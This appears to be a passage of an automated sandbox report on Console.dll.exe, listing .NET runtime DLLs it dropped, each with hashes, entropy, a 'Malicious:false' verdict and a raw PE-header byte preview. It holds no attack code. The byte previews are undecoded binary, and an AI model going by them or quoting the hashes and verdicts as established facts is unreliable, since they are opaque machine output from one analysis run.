                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.f.........." ..0..p............... ........... ....................................`.................................7...O.......p............z...T..............8............................................ ............... ..H............text....o... ...p.................. ..`.rsrc...p............r..............@..@.reloc...............x..............@..B................k.......H........n...x..................<.......................................:.(9.....}....*..{....*:.(9.....}....*..{....*...0..........(:.....-..*.o;...*...0..T.......~&.........(<....)...(=...-.~'...(>....(?...s@....)....)...(A.......,..(B....&...*.*........;C..........MM.......~,...._...*.0..(.......~&.........(<....+............,..(B....*.................0..........~&.........(<....+...(=...,.........,..(B.....9....(C...r...p......%.(..........(....(D...(E...&.8.(C...r...p...

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SqlClient.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1023360
                                                                                                                                                                                                                        Entropy (8bit):6.148689002721556
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:9SqIAB+KyECe4rnKwJyjyIcAL07LgUulGC9337lTQaf60FhFoFmF8cjcsc4FEFbZ:9SqIAB+KyECe4bNyjyIcALCgUud7lT
                                                                                                                                                                                                                        MD5:0AEBC8E926BD1F1269E5A053B6B541DD
                                                                                                                                                                                                                        SHA1:B40671A4D2973A1E4D71DC674308B8883EBE58F9
                                                                                                                                                                                                                        SHA-256:5F79C075D83904AC64510C3DC77E45980EA38B82204E39C3913531BFFF78585B
                                                                                                                                                                                                                        SHA-512:AB5D8F401F86C911DE64D8083E507C63012D9CED7AF32FD28414104E4C2E89305FBE09C49EBE9F1B2AE45FE1F45C9179BCFA4A2324D8DA1201769FAEB11F1A45
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@)............" ..0..p...........{... ........... ..............................,.....`.................................1{..O....................z...#..........<z..T............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................e{......H.......@...$...........d"..XW...y........................................{E...*..{F...*..{G...*..{H...*..(I.....}E.....}F.....}G......}H...*....0..k........u......,_(J....{E....{E...oK...,G(L....{F....{F...oM...,/(N....{G....{G...oO...,.(P....{H....{H...oQ...*.*..0..b....... .e.V )UU.Z(J....{E...oR...X )UU.Z(L....{F...oS...X )UU.Z(N....{G...oT...X )UU.Z(P....{H...oU...X*...0...........r...p......%..{E....................-.q.............-.&.+.......oV....%..{F................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):25264
                                                                                                                                                                                                                        Entropy (8bit):6.27489165516772
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:d/AAaFiTCmM82SuxDJQWWNFWiV5kHRN71PkP/6fR9zjgU8:5paFiTCm0DJQl259zm
                                                                                                                                                                                                                        MD5:B5437FF46BFE849D72448538F858CBED
                                                                                                                                                                                                                        SHA1:CCF67B2CC5B138FE3A9B0B1122388A2124BA136D
                                                                                                                                                                                                                        SHA-256:B37119E9AF0133E90A42A542768F130BD7F4D0A1B90A31A4C9C3967B20D2A39F
                                                                                                                                                                                                                        SHA-512:16CF531B355F14B33D06ED8A76D21D66F24BFDB3F7196DD2E13981EC40A82C23CE9BA1F4B41E67842EED15EDCB02142E8DB1E491977858D7C6E5FDA39B796F03
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..0...........O... ...`....... ..............................O.....`..................................O..O....`..4............:...(...........N..T............................................ ............... ..H............text..../... ...0.................. ..`.rsrc...4....`.......2..............@..@.reloc...............8..............@..B.................O......H.......P ...-..................HN......................................BSJB............v4.0.30319......l...T...#~...... ...#Strings.....+......#US..+......#GUID....+......#Blob......................3................................<.....H.........~.......................).r.........;.................Y.......................B....._...................#...........................).....1.....9.....A.....Q... .Y.....a.....i.....q.....y.....................R.....[.....z...#.....+.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                        Entropy (8bit):6.666692273267018
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:avaTZrfWE2WiVTb2HRN7yQ1NbZR9z3E4n83:ava9rfO/iyYFT9z0483
                                                                                                                                                                                                                        MD5:0A8271941CF0CDAAFEC47B472F829B6B
                                                                                                                                                                                                                        SHA1:96CF23BA29E6A54E5AF8DA55009145831FF7CE71
                                                                                                                                                                                                                        SHA-256:EC478EB4314678A1DA907F574DB91687D3C10CA309F62A280B9DB96F1C98643F
                                                                                                                                                                                                                        SHA-512:F1249CFDB4055334D03AACC7ED664BF61473F72D52FEBD17A45419C18913617F6694A24BA376AFBD98D23A5D45E99210A9167E0FCEBE48E85184365E8C7974EF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v............."!..0..............+... ........@.. ..............................8.....`..................................+..N....@...................)...`.......*..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P .......................................m.t].....2q]3........\^.v/...&E.....*..E..7,.....3..-.PK.w..{.K.U8..tZ.... w .{{....tC=..W...4....d.I.c...5!..c.....y..Q?.R.`vBSJB............v4.0.30319......`.......#~......H...#Strings....4.......#GUID...D.......#Blob......................3......................................Z.........9.........................,...5.............{.........F.............................#.....p.........................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.721890986035252
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:1ExxAkAWFCHWwmWiNH3WT56Os1HnhWgN7aIWfdbTseUfX01k9z3AcgkS3L9r:sOWwmWiNO5kHRN7y/6fR9zjgNRr
                                                                                                                                                                                                                        MD5:A3F55D2C1A99E772D9A3995533E0EDBA
                                                                                                                                                                                                                        SHA1:D75AEC147BA78FA5B69A1EA3D19CE5A5A251B530
                                                                                                                                                                                                                        SHA-256:3A95E6BA32E26677B1B3E32BB0C38EAFB2BA1166DE2EDB3206F2453F843AA081
                                                                                                                                                                                                                        SHA-512:854B1740D273C9C9761BC5A9C53F0F2472C1FF423D763D6502C96482DB8E98DF8BAF8911D554FD403E79B1578A0CEE9848A82743C84D1C81D08EEA2144BC7179
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............*... ...@....... ..............................DW....`..................................*..O....@...................(...`.......)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................$)......................................BSJB............v4.0.30319......l...H...#~..........#Strings....<.......#US.@.......#GUID...P.......#Blob......................3..................................................W...R.W...g.D...w...........0.....w.......................>...........................................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>...y.>.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):383152
                                                                                                                                                                                                                        Entropy (8bit):6.7122884890449885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:a9/el0G9TeFjCjf9AXTHvS+mMn5T/tvjEcGnMHIH7yP6XcZa+yrW+:ufG9r9UTHKXMnnjxYyiXsaQ+
                                                                                                                                                                                                                        MD5:8510E90AEF9D465FAE443AFAD605896E
                                                                                                                                                                                                                        SHA1:FCF4E304C3FD817F4566AF1D5E33B1A4C7153502
                                                                                                                                                                                                                        SHA-256:58A28A647352934EBF6B8B883D23A2ED594DE7DF1793962738E9ADADD935618D
                                                                                                                                                                                                                        SHA-512:980B774149AB6DD133C8D5CA59C490FCA0DBDD85329FFB600ED71D6F55B3AEA05AD2DBB9EEAC7DE1661798DE5E81C2C9119B0C6400EAB2285E488923A99C7721
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............!..............................@.......................................@.................................................Le..x........(...p..$3..$)..p...............................................................H............text..._........................... ..`.data....e.......p..................@....reloc..$3...p...@...p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):47280
                                                                                                                                                                                                                        Entropy (8bit):5.238310167464012
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:KjWCrdVDTsP/QEBuk3bqUghjdU/CKPivxbzY17tnAQTR1MS06Ze7i69zocJ:KjVddsP/QEBuk3bqUghjdyCKPipb017w
                                                                                                                                                                                                                        MD5:079B36DFECD8D124443E51EAA6246F59
                                                                                                                                                                                                                        SHA1:9E41A8FCFC5663DAFF06EB1FA5A2F75870845515
                                                                                                                                                                                                                        SHA-256:E7BDDF2552FEF7660535EBDF5C2121FBD8D1DF68E7FC0193018C6C7AE1209B9E
                                                                                                                                                                                                                        SHA-512:385266D2A1EEAF5A0147B02F7CEF346671D793D0B602088DDA74FD95555352BCCED930CD3A347D3E5E6D8677E9A974E098D65B45F46C834841CD4314BEF1861D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....2............!.....`... ...............p....@.......................................@.................................................p...@........(..........\...p...............................................................H............text...!Q.......`.................. ..`.data... ....p.......p..............@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Process.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):297120
                                                                                                                                                                                                                        Entropy (8bit):6.737836566557426
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:b8iKUGdS6xax69p4Idg+T9jb3b41PlmFO/mYthleqjwoZ:b8iKUGg6Yx69pvdgMgvI27
                                                                                                                                                                                                                        MD5:4EB2207595FEF7EFDD73E61BF9EFE5E9
                                                                                                                                                                                                                        SHA1:E38510D48DFDB0A1BE55DC18A6DDD4A093CB5DE8
                                                                                                                                                                                                                        SHA-256:75BA3A9DC221D9EA99435710BF879EFDF80572D026F36042276EBB84B339191D
                                                                                                                                                                                                                        SHA-512:CB7E05274EC3B7D8EF77A7B2AE8ABC8249BEEC2767DF6E0D2B8409E8CA46874F0F3E0DD09A2F65BFAEAF7529371010DC4FBC5DC6E9CF2A0FB3003ECC4C488068
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.............!.........p....................@..........................`............@..................................................F..x....`...(...0..H%...%..p...............................................................H............text...h........................... ..`.data....>.......@..................@....reloc..H%...0...0...0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):43184
                                                                                                                                                                                                                        Entropy (8bit):4.943216309200159
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:CW7gWiB/iYI11iR+DUn/whUeaF8vkFfwC/FmPF/NbDhzW5kHRN7G6R9zSJ:vA/iY81M+DUno7S8vkFY4mPFJhG29zy
                                                                                                                                                                                                                        MD5:CE95CCE486C7C1FAD9ABF4C64B49B232
                                                                                                                                                                                                                        SHA1:614AF9E658219A2F0D532667483A12E9784C61F8
                                                                                                                                                                                                                        SHA-256:FB31A2AB680D19B93883E7B8B1FA29BC7D2831B0B8C2BA0929776A76F428E6FF
                                                                                                                                                                                                                        SHA-512:EED3BF1F1DE3718568F4AC00BDACDC741844AA6E891FB67F16F0B547CE4297E153B13E52531F32B99DDB23E76E6D1B9D842C27EE88681A7C4F15AE8DC5677607
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+|W............!.....P... ...............`....@..................................u....@.....................................................p........(...p..t.......p...............................................................H............text....C.......P.................. ..`.data........`.......`..............@....reloc..t....p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):63648
                                                                                                                                                                                                                        Entropy (8bit):6.056891886650893
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:Gz0xBoVgi+3rglmt5F31A7YXNZ/OSkkvgd5/wS3xbVgip57vbC8F/iQ9zA:Gz0egimrglmtrBDF7gjNVVgW7ztNiYzA
                                                                                                                                                                                                                        MD5:34C224954954029DD7B181CDF9B160AC
                                                                                                                                                                                                                        SHA1:29774A634705E4B9C0768A233F1FFB8244024CEB
                                                                                                                                                                                                                        SHA-256:A9196DF41CFD8367A8D91C0A18B53BEAAB3DD9696EFDFF353BC2AF7D5A5E08B5
                                                                                                                                                                                                                        SHA-512:B3A2A39E0B6B9E5E4A31B61BC81E9A999D7BAEBC467EA9C25703F36FB253C8A19DF15BDABDEE95FF9F7F4D49BB5D57B561D4CC4DEA5F5D01085638835D41127D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!......... ....................@.......................................@.............................................0.... ...........(..............p...........................................................0...H............text...4........................... ..`.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                        Entropy (8bit):6.8138934238337745
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:gATq3xAIjMFWgUWidWT3WT56Os1HnhWgN7acWfiAUlyttuX01k9z3AWPoD9Ow:gwqhfoWgUWi8y5kHRN7RAzSR9zdPaEw
                                                                                                                                                                                                                        MD5:9921B3EFBD4ACA034E9A5FB6E0D05D3E
                                                                                                                                                                                                                        SHA1:DBBA9672340E4134D673A5209D338A97F4B7F9A8
                                                                                                                                                                                                                        SHA-256:E309561C43DD65923EBF3AE7407BC492CFA70FD8D5EAAB26F24609F006D22C3E
                                                                                                                                                                                                                        SHA-512:0AF3BE86BCA9AD5128AD4C3809F70AA62E4DFF3F8640E39B81AC370F28A7F71A3F993259ED8768BD5E05487167AE4CF3C97D2FB2FBC9DAE4672ADDE0BD816FFA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.>..........." ..0..............)... ...@....... ...............................K....`.................................Q)..O....@...................)...`......`(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..(.......#Strings............#US.........#GUID...........#Blob......................3................................................F.h.....h.....U.................%...(.%...........%.....%.....%.....%.....%...f.%.....%.................O.....O.....O...).O...1.O...9.O...A.O...I.O...Q.O...Y.O...a.O...i.O...q.O...y.O.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):129184
                                                                                                                                                                                                                        Entropy (8bit):6.245550906752953
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:QbwBgfjej3/BwJPi0dpwQn60x7cftbgLeIQV/xbqN/WH:QUBgM3/BwJPi6aQn60x7cftbgyl
                                                                                                                                                                                                                        MD5:53BCCC6D11BFD8F180E6CE1BD7200065
                                                                                                                                                                                                                        SHA1:82C797BB841B04CEAB8F3D1C9854C7E092414617
                                                                                                                                                                                                                        SHA-256:F0F23C3C2F30ECD28E88F505DC2924EE3BA0B0FCA586EC944AFBA5EACD236A10
                                                                                                                                                                                                                        SHA-512:DCC7F790C4FA795DBBA66BA799431AA5B32DA6EA162B14CE6F10960AEA3103BFAC295CD7F2B8ED99CE147BFE86DE4AED33D07C1124DD4DA59317281894D0FDAA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........@....................@.......................................@.................................................`+..(........(..............p...............................................................H............text....x.......................... ..`.data............ ..................@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                        Entropy (8bit):6.725526466135195
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:866DDj+ylxkWSDWimMuWXebPpUNTQHnhWgN7acWqN78mKDUX01k9z3Ae/TOsS0:S+yPkWSDWimMTb2HRN7r7/pR9zN/h
                                                                                                                                                                                                                        MD5:30927E5DD5BAD334A63B9613AE0C1164
                                                                                                                                                                                                                        SHA1:9CB76776DE17E4F68DDBD42BEBAB8E915EC562FE
                                                                                                                                                                                                                        SHA-256:63CD02270F4CB6FCDE5F87EC50A1F7A432FA608FBACA65BC287E2ECF68166C99
                                                                                                                                                                                                                        SHA-512:159C7B4081AD57A88AFDFB5280C484256BC34331580B34C06F99A76B441A6C0B1C3B8D9CE6DAA8140916759340428CF4F8A606B03DF7BCF5EA54BC0A973A2F64
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z..........."!..0.............n-... ........@.. ...............................w....`..................................-..Z....@...................)...`.......,..T............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P-......H........ ..H...................P .......................................g!.ru.%...k.$...?...LzY^...a....6IUS.."T..@e\...^b&..1A.Rs.aIe#....7...N.8..=#.#rg.&.p.'Q..RB$`B.p&'....6:.b..R.L.ob..~.[sBSJB............v4.0.30319......`...x...#~..........#Strings............#GUID...........#Blob......................3................................ .....................O.......................c....._...........}...........6...........B...........................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Common.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):414280
                                                                                                                                                                                                                        Entropy (8bit):5.92089676794765
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:xCBivlueKi3O567Rf25THDAbPvFsPdBXP2hpqW0/nx0q:xCaKi1HF4BfNx
                                                                                                                                                                                                                        MD5:DDD24ED9FE3B256AB955554893D832C6
                                                                                                                                                                                                                        SHA1:DDF4603FC7AB70F5E49C3CC7F7C691977EF82DD0
                                                                                                                                                                                                                        SHA-256:DF409DE7822EBE4871AADEF1F8E4A553406395C8D692704037781777BA650300
                                                                                                                                                                                                                        SHA-512:F1497BB0CB39A325923BD13314A8C8125B06978BD2D6BDB7387F4E838D27AD0E735461C8BC2584E421E9C9E8DA2AAEDC6757CAD6F6678EC5BCED41A81E8D0E34
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..$..........:C... ...`....... ....................................`..................................B..O....`..................H$...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................C......H.......8...................h...pA......................................"..(0...*2.{1...(@...*Br...p.....(....*Bre..p.....(....*Z.J./..*.J.1..*..(....*..0.............(2.....-..(.....r...p..(2...&.-...-..+..T.*F.r!..p(3...,..*.*..*..0..1.......(....,..%-.&.*..(.....o4......&...,...o5...,..*.*............... ....(....,.r...p......%...%...(6...*..(7...*.(....,.r...p......%...%...%...(6...*...(8...*.(....,!r...p......%...%...%...%...(6...*....(9...*..,&(....,..r...pr...p.(6...(:

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):129184
                                                                                                                                                                                                                        Entropy (8bit):6.1760243184217885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:0ml6TELg2FPQTmKf2L4BsH00N6n7BQaW5CIZTSc5of:96TT2yTdf2L4BsqBQK85a
                                                                                                                                                                                                                        MD5:70B9DD24667DDABFF86D89223A73F7CE
                                                                                                                                                                                                                        SHA1:D09AD979D49DE1424700FFC0565C5B39A06F63E4
                                                                                                                                                                                                                        SHA-256:C41FB93E67491C2B4ED4E14CB1F42DC9D0F13699EE4453C90821759262280ED8
                                                                                                                                                                                                                        SHA-512:76E4B0986FDC5956DE8D96C0C0107A8BC731FAB3AC326D9E5961A776D46FDE5F01129E44991D90AA6E1A21EE95532ACEEA5E5DBBC8E812A021DBD399866D3127
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n|............!.........0....................@.......................................@..................................................'...........(......d...8...p...............................................................H............text...w........................... ..`.data............ ..................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20744
                                                                                                                                                                                                                        Entropy (8bit):6.423803072929879
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:NTiP7uC8MYITeteBmvvWOtWiKTb2HRN7SNnSR9zdPaAep:NWjao/iSNne9zBkp
                                                                                                                                                                                                                        MD5:25D7E6DED3CD539A5C4FD5D59CB29954
                                                                                                                                                                                                                        SHA1:15E43585569C7E35BBAE766A3E279604A84358F2
                                                                                                                                                                                                                        SHA-256:1E4C39CC5D5B446B3FCCA258C930CAD99DBE4795C48AF6B9732858AB7ADFF479
                                                                                                                                                                                                                        SHA-512:A01DD690696A9C7C33A0F159A9F3BEFEE8BE6A979C9A181C5199670FF308A0DFDB6C90356D18E0DB8098FF64A114550E06FA4DFE869F659616FAA72CB0DDD09E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:s............" ..0.............^=... ...@....... ....................................`..................................=..O....@..T............(...)...`......,<..T............................................ ............... ..H............text...d.... ...................... ..`.rsrc...T....@....... ..............@..@.reloc.......`.......&..............@..B................==......H.......P ..\....................;......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3................................................s.#...C.#...~.....C...........d.`...U.`.........*.`.....`...!.`.....`.....`.....`.....`.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                        Download File
